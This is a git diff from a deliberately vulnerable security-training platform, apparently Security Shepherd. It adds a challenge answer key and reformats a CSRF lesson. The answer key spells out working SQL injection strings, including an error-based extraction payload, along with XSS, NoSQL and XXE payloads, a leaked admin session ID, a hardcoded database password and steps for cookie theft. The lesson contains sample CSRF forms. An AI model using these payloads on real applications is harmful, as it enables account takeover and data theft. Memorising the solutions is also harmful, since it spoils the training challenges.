+c7ac1e05faa2d4b1016cfcc726e0689419662784.solution = View the source of this challenge and inspect the JavaScript at the end of the page. You can deobfusticate the JavaScript with an on line web tool, give it a Google. The script contains two functions, and one of them is for a HTML element that is not in the level. This function is an admin function and reveals a URL very similar to the user function. Send a valid post request, as described by the JavaScript, to that URL to retrieve the result key.
+b3cfd5890649e6815a1c7107cc41d17c82826cfa.solution = There are a number of ways to defeat the crypto and get the encryption key in this challenge. The quickest way is to submit base64 encoded spaces. The crypto XOR's the spaces with the key and returns the resultant 'cipher text which is the encryption key.
+ced925f8357a17cfe3225c6236df0f681b2447c4.solution = Users must discover the session id for this sub application is very weak. The default session ID for a guest will be 00000001 base64'd twice. The admin's session ID is TURBd01EQXdNREF3TURBd01EQXdPUT09 (0000000000000009 when decoded).
+c6841bcc326c4bad3a23cd4fa6391eb9bdb146ed.solution = This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; http://""onmouseover=alert(123);//
+53a53a66cb3bf3e4c665c442425ca90e29536edd.solution = The Admin credentials are stored in plain text in a db file. Go to /data/data/insecuredata/databases and run the following command " Strings Members" or "cat Members". To get to root CLI on the VM press alt F1.
+307f78f18fd6a87e50ed6705231a9f24cd582574.solution = The Admin credentials are encoded in a db file. Go to /data/data/insecuredata1/databases and cat the Users.db file. Burp has a decoder which will reveal the key, alternatively there are online tools which can also do this
+da3de2e556494a9c2fb7308a98454cf55f3a4911.solution = The Admin credentials are hashed (but not salted) in a db file. Go to /data/data/insecuredata2/databases and cat the db file called Password.db. The key is a password which has been hashed using MD5, there are online tools which will attempt to crack this hashed value.
+335440fef02d19259254ed88293b62f31cccdd41.solution = The Login is vulnerable to SQL injection, Admin ' OR 1 = 1 ; -- will work in the username field and anything in the password field (So a blank field error does not occur).
+a3f7ffd0f9c3d15564428d4df0b91bd927e4e5e4.solution = The login is vulnerable to SQL injection however, some input is being filtered. OR + 1 = 1 will be filtering into spaces of comments. anyOtherValue=anyOtherValue will work as well as 0r.
+e635fce334aa61fdaa459c21c286d6332eddcdd3.solution = The login is vulnerable to SQL injection however there is filtering in place, to get an OR in the statement use OORR, to get a comment use -OR-. So the following statement should work: Admin ' oorr 'a' = 'a' ; -or-
+ef6496892b8e48ac2f349cdd7c8ecb889fc982af.solution = The chat has not been encrypted but encoded using hex, this can be decoded using burp or the following site:http://www.asciitohex.com/
+3f010a976bcbd6a37fba4a10e4a057acc80bdc09.solution = The chat has been encrypted using DES. The same key is used every time and the key is stored insecurely within the app package.
+63bc4811a2e72a7c833962e5d47a41251cd90de3.solution = The chat has been encrypted using AES (with CBC mode). Multiple keys are used this time but keys are stored insecurely on the App. key 1 decrypts message 1, key 2 decrypts message 2 and so forth.
+2ab09c0c18470ae5f87d219d019a1f603e66f944.solution = The key is stored in the source code of the App, get dex2jar and use it to turn the apk to a jar file, then open the jar and find the key in the main class.
+f16bf2ab1c1bf400d36330f91e9ac6045edcd003.solution = The key is stored in the source code of the App, get dex2jar and use it to turn the apk to a jar file, then open the jar. The key is present within a conditional statement in the class called Triangle.
+9e46e3c8bde42dc16b9131c0547eedbf265e8f16.solution = The key is not present in the code, however a check for the key is. This can be reverse engineered and the code extracted and run as a java class. Running this java class after changing the check to print the key will reveal it.
+1506f22cd73d14d8a73e0ee32006f35d4f234799.solution = Logs are stored insecurely on the App. These contain the key. The logs can be found in a directory called "files" within the app package in the data/data directory. Every time the app is interacted with, new logs are generated.
+ed732e695b85baca21d80966306a9ab5ec37477f.solution = In this challenge you must craft a HTTP request to reset an admin accounts password. The HTTP request is described in the javascript contained in the challenge page (The last function in the script). The token value in this request must be a base 64 encoded date time value such as the following;
Thu Aug 28 18:48:10 BST 2014
The token value must be less than 10 minutes from the servers time.
+cfbf7b915ee56508ad46ab79878f37fd9afe0d27.solution = To complete this challenge a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with their CSRF token. This CSRF Token will work on any user.
+9294ba32bdbd680e3260a0315cd98bf6ce8b69bd.solution = The first step in completing this challenge is to get an admin user's email address. Try to sign in as 'root' or 'superuser' to get one. To complete this challenge a user must use SQL Injection in the email Parameter in the GET request to the SecretQuestion servlet. The following email submission will achieve the response of the users secret answer (This example is URL Encoded)
You can then use this answer along with a user email address to complete the level.
+7153290d128cfdef5f40742dbaeb129a36ac2340.solution = To complete this challenge a user must send the server a request with the 'challengeRole' value set to 'nmHqLjQknlHs'. The challengeRole cookie is encoded with ATOM-128. The value 'nmHqLjQknlHs' when decoded is 'superuser'.
+145111e80400e4fd48bd3aa5aca382e9c5640793.solution = To complete this challenge a user must deobfusticate the javascript found in /couponCheck.js and extract the relevent cryptoinformation to manually decrypt a javascript array of encrypted coupons, or to manipulate the javascript so that it returns the decrypted coupons. The "des" function call reveals the Encryption key and the padding used by the algorithm. The "des" function in the javascript can be changed to decryption mode by changing the boolean argument to negative. The text to be decoded needs to be taken from the array of encrypted coupon codes. To recover the coupon code for free oranges you can run this command from your browsers console when opened in the context of the level's JSP page; des(chars_from_hex('0ba950d08830c8079bded71b852934453db8f4ffff1f5842'), chars_from_hex(bits[6]), 0, chars_from_hex('821fd38b9a7c0247') ? 1 : 0, chars_from_hex('821fd38b9a7c0247'));
+adc845f9624716eefabcc90d172bab4096fa2ac4.solution = To complete this challenge, a SQL Injection Flaw must be exploited to learn the name of the super admin in a request described in the module's javascript. This function is not used by the presented HTML. You must manually craft this request and include an injection attack through the BASE64 encoded cookie named 'currentPerson'. a simple "or"1"!="0 vector will work. Take the super admin's name and submit it encoded for BASE64 as the currentPerson cookie value in the request that is submitted when the Admin button is clicked. This will return the result key for the challenge.
+64070f5aec0593962a29a141110b9239d73cd7b3.solution = To complete this challenge, a SQL injection flaw must be exploited. The vulnerable paramater is 'subUserEmail'. It must be mostly well formed as an email address to get past the validation process. The following vector, which is URL encoded, will sign the user in as user 1.
'or'1'='1'union%0aselect%0auserName%0afrom%0ausers%0awhere''!='%40v
+1e3c02ad49fa9a9e396a3b268d7da8f0b647d8f9.solution = To complete this challenge, connect the android debug bridge to the VM and run adb logcat –d \ to dump logs to a text file. Trigger the key log by pressing the lotto button
+f40b0cd5d45327c9426675313f581cf70c7c7c28.solution = To complete this challenge, start the app, go to the command line of the VM using ALT F1 and then navigate to /sdcard/, pictorial logs are places there. Connect adb to the device and run the adb pull command on the logs.
+ba6e65e4881c8499b5e53eb33b5be6b5d0f1fb2c.solution = To complete this challenge, start the app, and login to get the key. you must login with an auth code. the code must be odd, must contain the numbers 2 and 4 and must be six digits long. previous codes may show up in a suggestion when typing the code in which will reveal this pattern.
+52885a3db5b09adc24f38bc453fe348f850649b3.solution = To complete this challenge, find jarsigner which comes with the jdk and in a command line run the following: jarsigner -verify -verbose -certs ReverseEngineer2.apk.
+3b1af0ad239325bf494c6e606585320b31612e72.solution = To complete this challenge, use adb pull to grab the key file and the key.db file from the app's /data/data/ directory. With the db password: Pa88w0rd1234 decrypt the database to get the key to the level. This will either require a small amount of coding or you can download and build sqlcipher. Finally there is an App on the playstore which can be used called SQLCipher Decrypt.
+0cdd1549e7c74084d7059ce748b93ef657b44457.solution = To complete this challenge, you need to login to the App. The password reset function rquires two answers which can be gathered from the logs on the App. The answers are chicken and meade. This will reset the password to a six digit code and allow you to login and view the key.
+368491877a0318e9a774ba5d648c33cb0165ba1e.solution = This challenge requires a bit of thinking to complete organically. First you must find some admin email addresses. The login function will return them when valid usernames are submitted. Try using root or superuser with any password. Use the email address in the secret question function to get that user's Secret Question. The secret question for each user is 'What is your favourite flower?'. There are only so many flowers. Any of the following flowers are valid answers. Root's favourite flower is 'Franklin Tree'.
Valid answers: Jade Vine, Corpse Flower, Gibraltar Campion, Franklin Tree, Middlemist Red, Chocolate Cosmos or Ghost Orchid
+6be5de81223cc1b38b6e427cc44f8b6a28d2bc96.solution = The shopping cart application does not validate the number of items you are buying. Set the orange amount to 1, apple amount to 0, banana amount to 0 and the pineapple amount to -101.
+3b14ca3c8f9b90c9b2c8cd1fba9fa67add1272a3.solution = The shopping cart application only ensures that the amount of items bought is a positive number. By buying 999295724 oranges, the total cost integer value will overflow and enter a negative state.
+b9d82aa7b46ddaddb6acfe470452a8362136a31e.solution = Enter a valid number in the submit box and click submit number. Capture the request in a HTTP proxy and modify the number to a negative value.
+bf847c4a8153d487d6ec36f4fca9b77749597c64.solution = Sign into the application with the generic admin default combination of 'admin' and 'password'.
+fcc2558e0a23b8420e173cf8029876cb887408d3.solution = To complete this challenge, you must force another user to submit a post request which contains a JSON payload. The easiest way to achieve this is to force the user to visit a custom web page that submits the post request. This means the web page needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. It is possible to use HTML forms to submit cross domain POST requets with JSON payloads by setting the enctype attribute to text/plain and then forming the JSON payload around the necessary equals symbol which normally deliminates the parameter name from the parameter value. The following is an example web page that would complete the challenge
The class form function should be used to create an iframe that forces the user to visit this attack page.
+6158a695f20f9286d5f12ff3f4d42678f4a9740c.solution = To complete this challenge, you must be able to capture the traffic of another user. The simplest way to simulate this would be to create a second user account and open it in a separate browser and open this challenge. You could then just steal the cookie straight from the browser. To demo how to solve this as expected you would actually open Wireshark and record the 2nd user opening the challenge. Filter the network capture for ip.dst == ShepherdInstanceIp, and find the unencrypted HTTP packet. Right click it and select 'Follow TCP stream'. You'll see the cookie in that dialog.
Once you have the token collected, in your original browser, click the button and intercept the request with a Proxy. Replace your cookie value with the one you collected from another user.
+de626470273c01388629e5a56ac6f17e2eef957b.solution = To complete this challenge you must first register an account. The account must have a unique name. The next step is to click the refresh balance button. Capture this request, and replay it with different account numbers until you find one with cash. If you are the first person to attempt this challenge, the account number 1 should have 10 million in it. Take note of the account number that has cash. Now fill out the 'Transfer Funds' form with any data. Capture that requets and change the receiver account number parameter to the value the sender account number parameter is currently equal to (This is your account number), change the sender account number to the identifier you noted earlier and set the transfer amount to as high as possible (must be some money left in account to work). Keep doing this untill your account has more than 5 million in it. Then open the level again or sign in / out of the account to get the result key
+dc89383763c68cba0aaa1c6f3fd4c17e9d49a805.solution = The following attack vectors will expose the result key over two queries.
Step One: test' AND (SELECT 7303 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),1,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hdTL'='hdTL
This will return an error revealing the first part of the key in the message with qxkzq1 added to the end for padding. remove those characters and record the rest of the key revealed.
Step Two: test' AND (SELECT 9441 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),51,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ilGf'='ilGf
This will reveal the second part of the key, padded with qkjvq at the start and qxkzq1 at the end. Remove the padding and add the rest to the previously revealed part of the result key. That is the key to solve this challenge.
+5b461ebe2e5e2797740cb3e9c7e3f93449a93e3a.solution = Connect to the device via adb and run the following command - adb shell content query --uri content://com.somewhere.hidden.SecretProvider/data
+c685f8102ae0128c2ab342df64699bb8209a0839.solution = One way to exploit this security risk is to escape the leading backslash that is added before apostrophes with another backslash. The following attack vector will solve the level;
\'or"1"="1"; -- 
+d7eaeaa1cc4f218abd86d14eefa183a0f8eb6298.solution = The database in this level utilises MongoDb which does NOT use SQL. Queries in MongoDb are done through JavaScript. You need to stop the request in an HTTP proxy and use the following JavaScript to exploit the vulnerability: ';return(true);var a='a
+f02ce6bcd0a822d245433533997eaf44379065f4.solution = This challenge is difficult to exploit and heavily depends on your user name. See this github ticket for more details. This was a vulnerability in Security Shepherd that was fixed
+df2ac757cc135dcb8ce5ea01f677c74f04b446d6.solution = To exploit this take Example 1, replace file:///etc/shadow with file:///usr/local/tomcat/briefcase.pulp and also replace <foo>&xxe;</foo> with <email>&xxe;</email>
+08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae.solution = To exploit this view the source of the iframe where you'll see two functions for sending a request - leFormNew and leFormOld. The new one is for JSON and the old one uses XML where the developers left this one in place and can be exploited through XML injection. It is exploited the very same way as the XXE lesson.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.properties b/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.properties
index 18690010c..877dc181a 100644
--- a/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.properties
+++ b/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.properties
@@ -1,15 +1,19 @@
-title.question.csrf=What is a Cross-Site Request Forgery?
-paragraph.info1=A Cross-Site Request Forgery, or CSRF, attack forces a user's browser to send a forged HTTP request with the user's session cookie to an application, tricking the user into unknowingly interacting with an application that they are currently logged into. CSRF attacks are possible when the application does not ensure that a user is in fact interacting with it. The severity of a CSRF attack varies with the functionality of the application the victim is tricked into interacting with. If the attack is aimed at an administrator, the severity will be a lot higher than those aimed at a guest user.
-paragraph.info2=To prevent CSRF attacks, every request must contain a nonce token (an unpredictable number) to be included with every request. To find CSRF vulnerabilities in applications, this is the token that is tested. If a request does not contain a nonce at all, then it is likely vulnerable to CSRF attacks. If a request does contain a nonce, then there are more steps to include in testing for CSRF. Even though the nonce is in the request it may not be validated or may work with a null value. It is possible that the application's nonce management will allow an attacker to use their valid nonce in other user requests!
-paragraph.info3=HTTP requests can be sent using JavaScript. Requests that are sent this way include an "X-Requested-With" HTTP header. If this is checked for on incoming requests, this can serve as CSRF protection without a nonce value. This header cannot be replicated from a remote domain, due to the Same Origin Policy, preventing an attacker from delivering the attack remotely. It is not advised to use this as a sole CSRF protection model, as browser issues are commonly found that allow attackers to send cross-domain requests from a browser.
-paragraph.info4=CSRF attacks can be performed on GET and POST HTTP requests. To force a victim to seamlessly submit a request in a GET request, the request (highlighted) can be embedded into an image tag on a web page such as follows; <img src="http://www.secureBank.ie/sendMoney?giveMoneyTo=hacker&giveAmount=1000"/>
-paragraph.info5=To force a victim to send a POST request, it requires a little more effort. The easiest way is to create a form that automatically submits using JavaScript, such as the following example; <form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST"> <input type="hidden" name="giveMoneyTo" value="hacker" /> <input type="hidden" name="giveAmount" value="1000" /> <input type="submit"/> </form> <script> document.csrfForm.submit(); </script>
-paragraph.info6=The function used by an administrator to mark this lesson as complete for a user is initiated by the following GET request to this server, where 'exampleId' is a valid userId;
-paragraph.info7=To complete this lesson, send the administrator a message with a image URL, that will show in an embedded <img> tag that will force them to submit the request described above, replacing the exampleId attribute with your temp userId
-challenge.title=Contact Admin
-challenge.description=Please enter the URL of the image that you want to send to one of Security Shepherds 24 hour administrators.
-button.hideIntro=Hide CSRF Introduction
-button.showIntro=Show CSRF Introduction
-button.sendMessage=Send Message
-generic.loading=Loading
-generic.error=An Error Occurred
\ No newline at end of file
+title.question.csrf = What is a Cross-Site Request Forgery?
+
+paragraph.info1 = A Cross-Site Request Forgery, or CSRF, attack forces a user's browser to send a forged HTTP request with the user's session cookie to an application, tricking the user into unknowingly interacting with an application that they are currently logged into. CSRF attacks are possible when the application does not ensure that a user is in fact interacting with it. The severity of a CSRF attack varies with the functionality of the application the victim is tricked into interacting with. If the attack is aimed at an administrator, the severity will be a lot higher than those aimed at a guest user.
+paragraph.info2 = To prevent CSRF attacks, every request must contain a nonce token (an unpredictable number) to be included with every request. To find CSRF vulnerabilities in applications, this is the token that is tested. If a request does not contain a nonce at all, then it is likely vulnerable to CSRF attacks. If a request does contain a nonce, then there are more steps to include in testing for CSRF. Even though the nonce is in the request it may not be validated or may work with a null value. It is possible that the application's nonce management will allow an attacker to use their valid nonce in other user requests!
+paragraph.info3 = HTTP requests can be sent using JavaScript. Requests that are sent this way include an "X-Requested-With" HTTP header. If this is checked for on incoming requests, this can serve as CSRF protection without a nonce value. This header cannot be replicated from a remote domain, due to the Same Origin Policy, preventing an attacker from delivering the attack remotely. It is not advised to use this as a sole CSRF protection model, as browser issues are commonly found that allow attackers to send cross-domain requests from a browser.
+paragraph.info4 = CSRF attacks can be performed on GET and POST HTTP requests. To force a victim to seamlessly submit a request in a GET request, the request (highlighted) can be embedded into an image tag on a web page such as follows; <img src="http://www.secureBank.ie/sendMoney?giveMoneyTo=hacker&giveAmount=1000"/>
+paragraph.info5 = To force a victim to send a POST request, it requires a little more effort. The easiest way is to create a form that automatically submits using JavaScript, such as the following example; <form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST"> <input type="hidden" name="giveMoneyTo" value="hacker" /> <input type="hidden" name="giveAmount" value="1000" /> <input type="submit"/> </form> <script> document.csrfForm.submit(); </script>
+paragraph.info6 = The function used by an administrator to mark this lesson as complete for a user is initiated by the following GET request to this server, where 'exampleId' is a valid userId;
+paragraph.info7 = To complete this lesson, send the administrator a message with a image URL, that will show in an embedded <img> tag that will force them to submit the request described above, replacing the exampleId attribute with your temp userId
+
+challenge.title = Contact Admin
+challenge.description = Please enter the URL of the image that you want to send to one of Security Shepherds 24 hour administrators.
+
+button.hideIntro = Hide CSRF Introduction
+button.showIntro = Show CSRF Introduction
+button.sendMessage = Send Message
+
+generic.loading = Loading
+generic.error = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7_zh.properties b/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7_zh.properties
index 5e2e378f4..19253e70b 100644
--- a/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7_zh.properties
+++ b/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7_zh.properties
@@ -1,16 +1,19 @@
-title.question.csrf=\u4EC0\u4E48\u662F\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020?
-paragraph.info1=\u4E00\u4E2A\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020\u653B\u51FB\u8FEB\u4F7F\u767B\u5F55\u7528\u6237\u7684\u6D4F\u89C8\u5668\u5C06\u4F2A\u9020\u7684HTTP\u8BF7\u6C42,\u5305\u62EC\u8BE5\u7528\u6237\u7684\u4F1A\u8BDDcookie\u548C\u5176\u4ED6\u8BA4\u8BC1\u4FE1\u606F,\u53D1\u9001\u5230\u4E00\u4E2A\u5B58\u5728\u6F0F\u6D1E\u7684web\u5E94\u7528\u7A0B\u5E8F.\u8FD9\u5C31\u5141\u8BB8\u4E86\u653B\u51FB\u8005\u8FEB\u4F7F\u7528\u6237\u6D4F\u89C8\u5668\u5411\u5B58\u5728\u6F0F\u6D1E\u7684\u5E94\u7528\u7A0B\u5E8F\u53D1\u9001\u6C42,\u800C\u8FD9\u4E9B\u8BF7\u6C42\u4F1A\u88AB\u5E94\u7528\u7A0B\u5E8F\u8BA4\u4E3A\u662F\u7528\u6237\u7684\u5408\u6CD5\u8BF7\u6C42.CSRF\u653B\u51FB\u53EF\u80FD\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u4E0D\u786E\u5B9A\u8BE5\u7528\u6237\u5B9E\u9645\u4E0A\u662F\u4E0D\u662F\u4E0E\u5176\u8FDB\u884C\u4EA4\u4E92.CSRF\u653B\u51FB\u7684\u4E25\u91CD\u7A0B\u5EA6\u968F\u53D7\u5BB3\u8005\u88AB\u6B3A\u9A97\u4EA4\u4E92\u7684\u5E94\u7528\u7A0B\u5E8F\u7684\u529F\u80FD\u51B3\u5B9A. \u5982\u679C\u653B\u51FB\u7684\u76EE\u7684\u662F\u7BA1\u7406\u5458,\u90A3\u4E48\u4E25\u91CD\u7A0B\u5EA6\u5C06\u5927\u5927\u9AD8\u51FA\u653B\u51FB\u76EE\u7684\u65E8\u5728\u666E\u901A\u7528\u6237.
-paragraph.info2=\u4E3A\u4E86\u9632\u6B62 CSRF \u653B\u51FB,\u6BCF\u4E00\u4E2A\u7528\u6237\u8BF7\u6C42\u90FD\u5FC5\u987B\u5305\u542B\u4E00\u4E2A\u4E34\u65F6Token(\u4E0D\u53EF\u9884\u77E5\u7684\u6570,\u5373\u968F\u673A\u6570).\u8981\u5728\u5E94\u7528\u7A0B\u5E8F\u4E2D\u627E\u5230 CSRF \u6F0F\u6D1E, Token \u5C31\u662F\u9700\u8981\u6211\u4EEC\u6D4B\u8BD5\u7684\u4E00\u4E2A\u5143\u7D20.\u5982\u679C\u4E00\u4E2A\u8BF7\u6C42\u6CA1\u6709\u5305\u542B\u968F\u5373\u6570,\u90A3\u4E48\u662F\u5F88\u6709\u53EF\u80FD\u88AB CSRF \u653B\u51FB\u7684. \u5982\u679C\u4E00\u4E2A\u8BF7\u6C42\u4E2D\u5305\u542B\u4E86\u4E00\u4E2A\u968F\u5373\u6570,\u90A3\u4E48\u5C31\u9700\u8981\u66F4\u591A\u7684\u6B65\u9AA4\u6765\u5BF9 CSRF \u8FDB\u884C\u6D4B\u8BD5.\u5C3D\u7BA1\u968F\u673A\u6570\u662F\u5728\u8BF7\u6C42\u5F53\u4E2D,\u5B83\u6709\u53EF\u80FD\u4E0D\u88AB\u9A8C\u8BC1\u6216\u53EF\u80FD\u5C31\u662F\u4E00\u4E2A\u7A7A\u503C. \u90A3\u4E48,\u5E94\u7528\u7A0B\u5E8F\u7684\u968F\u673A\u6570\u7BA1\u7406\u53EF\u80FD\u5141\u8BB8\u653B\u51FB\u8005\u4F7F\u7528\u4ED6\u4EEC\u672C\u8EAB\u6709\u6548\u7684\u968F\u673A\u6570\u4F7F\u7528\u5728\u5176\u4ED6\u7528\u6237\u7684\u8BF7\u6C42\u4E2D.
-paragraph.info3=HTTP \u8BF7\u6C42\u53EF\u4EE5\u901A\u8FC7 JavaScript \u53D1\u9001. \u4EE5\u8FD9\u79CD\u65B9\u5F0F\u53D1\u9001\u7684\u8BF7\u6C42\u5305\u542B\u4E00\u4E2A HTTP \u6807\u5934 "X-Requested-With". \u5982\u679C\u8BE5\u6807\u5934\u88AB\u67E5\u9A8C\u5728\u4F20\u5165\u7684\u8BF7\u6C42\u4E2D, \u8FD9\u53EF\u4EE5\u4F5C\u4E3A\u4E00\u4E2A\u5BF9 CSRF \u6CA1\u6709\u968F\u673A\u503C\u7684\u4FDD\u62A4. \u5B83\u4E0D\u80FD\u4ECE\u8FDC\u7A0B\u57DF\u590D\u5236, \u7531\u4E8E Same Origin Policy\u53EF\u4EE5\u9632\u6B62\u653B\u51FB\u8005\u8FDB\u884C\u8FDC\u7A0B\u653B\u51FB. \u4F46\u662F\u4E0D\u5EFA\u8BAE\u4EE5\u6B64\u4F5C\u4E3A\u552F\u4E00\u7684 CSRF \u4FDD\u62A4\u6A21\u5F0F, \u56E0\u4E3A\u5E38\u88AB\u53D1\u73B0\u7684\u6D4F\u89C8\u5668\u95EE\u9898\u662F\u5141\u8BB8\u653B\u51FB\u8005\u901A\u8FC7\u4E00\u4E2A\u6D4F\u89C8\u5668\u53D1\u9001\u8DE8\u57DF\u8BF7\u6C42.
-paragraph.info4=CSRF \u653B\u51FB\u53EF\u4EE5\u53D1\u751F\u5728 GET \u548C POST HTTP \u8BF7\u6C42\. \u8981\u4F7F\u53D7\u5BB3\u8005\u53EF\u4EE5\u65E0\u5F62\u5730\u63D0\u4EA4\u4E00\u4E2A GET \u8BF7\u6C42, \u8BE5\u8BF7\u6C42\u53EF\u4EE5\u5D4C\u5165\u5230\u7F51\u9875\u4E0A\u7684\u4E00\u4E2A\u56FE\u50CF\u6807\u7B7E, \u4F8B\u5982; <img src="http://www.secureBank.ie/sendMoney?giveMoneyTo=hacker&giveAmount=1000"/>
-paragraph.info5=\u8981\u5F3A\u8FEB\u53D7\u5BB3\u8005\u53D1\u9001\u4E00\u4E2A POST \u8BF7,\u6C42\u5E76\u975E\u8F7B\u800C\u6613\u4E3E.\u6700\u7B80\u5355\u7684\u65B9\u6CD5\u662F\u4F7F\u7528 JavaScript \u521B\u5EFA\u4E00\u4E2A\u81EA\u52A8\u63D0\u4EA4\u7684\u8868\u683C,\u5728\u6B64\u63D0\u4F9B\u4E9B\u793A\u4F8B\u5982\u4E0B; <form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST"> <input type="hidden" name="giveMoneyTo" value="hacker" /> <input type="hidden" name="giveAmount" value="1000" /> <input type="submit"/> </form> <script> document.csrfForm.submit(); </script>
-paragraph.info6=\u5BF9\u4E8E\u7528\u6237\u800C\u8A00,\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u7684\u6807\u5FD7\u662F\u4F7F\u7531\u7BA1\u7406\u5458\u4F7F\u7528\u7684\u529F\u80FD\u88AB\u521D\u59CB\u5316\u4E3A\u53D1\u9001\u4EE5\u4E0B GET request\u5230\u8FD9\u53F0\u670D\u52A1\u5668.\u5176\u4E2D'exampleId'\u662F\u4E00\u4E2A\u6709\u6548\u7684 userId.
-paragraph.info7=\u8981\u5B8C\u6210\u8BE5\u8BFE\u7A0B,\u9700\u53D1\u9001\u4E00\u6761\u542B\u56FE\u7247 URL \u7684\u4FE1\u606F\u7ED9\u7BA1\u7406\u5458,\u5176\u5C06\u663E\u793A\u5728\u4E00\u4E2A\u5D4C\u5165\u7684\u6807\u7B7E\u4E2D,\u5B83\u5C06\u5F3A\u8FEB\u4ED6\u4EEC\u63D0\u4EA4\u4E0A\u8FF0\u8BF7\u6C42(Request),\u4EE3\u66FF exampleId \u7684\u4E34\u65F6 userId \u662F
-challenge.title=\u8054\u7CFB\u7BA1\u7406\u5458
-challenge.description=\u8BF7\u8F93\u5165\u4F60\u60F3\u53D1\u9001\u7ED9 Security Shepherd 24 \u5C0F\u65F6\u670D\u52A1\u7684\u7BA1\u7406\u5458\u4E2D\u7684\u4E00\u4E2A\u7684\u56FE\u50CFURL
-button.hideIntro=\u9690\u85CF CSRF \u4ECB\u7ECD
-button.showIntro=\u663E\u793A CSRF \u4ECB\u7ECD
-button.sendMessage=\u53D1\u9001\u4FE1\u606F
-generic.loading=\u8BF7\u7A0D\u4FAF
-generic.error=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
+title.question.csrf = \u4EC0\u4E48\u662F\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020?
+
+paragraph.info1 = \u4E00\u4E2A\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020\u653B\u51FB\u8FEB\u4F7F\u767B\u5F55\u7528\u6237\u7684\u6D4F\u89C8\u5668\u5C06\u4F2A\u9020\u7684HTTP\u8BF7\u6C42,\u5305\u62EC\u8BE5\u7528\u6237\u7684\u4F1A\u8BDDcookie\u548C\u5176\u4ED6\u8BA4\u8BC1\u4FE1\u606F,\u53D1\u9001\u5230\u4E00\u4E2A\u5B58\u5728\u6F0F\u6D1E\u7684web\u5E94\u7528\u7A0B\u5E8F.\u8FD9\u5C31\u5141\u8BB8\u4E86\u653B\u51FB\u8005\u8FEB\u4F7F\u7528\u6237\u6D4F\u89C8\u5668\u5411\u5B58\u5728\u6F0F\u6D1E\u7684\u5E94\u7528\u7A0B\u5E8F\u53D1\u9001\u6C42,\u800C\u8FD9\u4E9B\u8BF7\u6C42\u4F1A\u88AB\u5E94\u7528\u7A0B\u5E8F\u8BA4\u4E3A\u662F\u7528\u6237\u7684\u5408\u6CD5\u8BF7\u6C42.CSRF\u653B\u51FB\u53EF\u80FD\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u4E0D\u786E\u5B9A\u8BE5\u7528\u6237\u5B9E\u9645\u4E0A\u662F\u4E0D\u662F\u4E0E\u5176\u8FDB\u884C\u4EA4\u4E92.CSRF\u653B\u51FB\u7684\u4E25\u91CD\u7A0B\u5EA6\u968F\u53D7\u5BB3\u8005\u88AB\u6B3A\u9A97\u4EA4\u4E92\u7684\u5E94\u7528\u7A0B\u5E8F\u7684\u529F\u80FD\u51B3\u5B9A. \u5982\u679C\u653B\u51FB\u7684\u76EE\u7684\u662F\u7BA1\u7406\u5458,\u90A3\u4E48\u4E25\u91CD\u7A0B\u5EA6\u5C06\u5927\u5927\u9AD8\u51FA\u653B\u51FB\u76EE\u7684\u65E8\u5728\u666E\u901A\u7528\u6237.
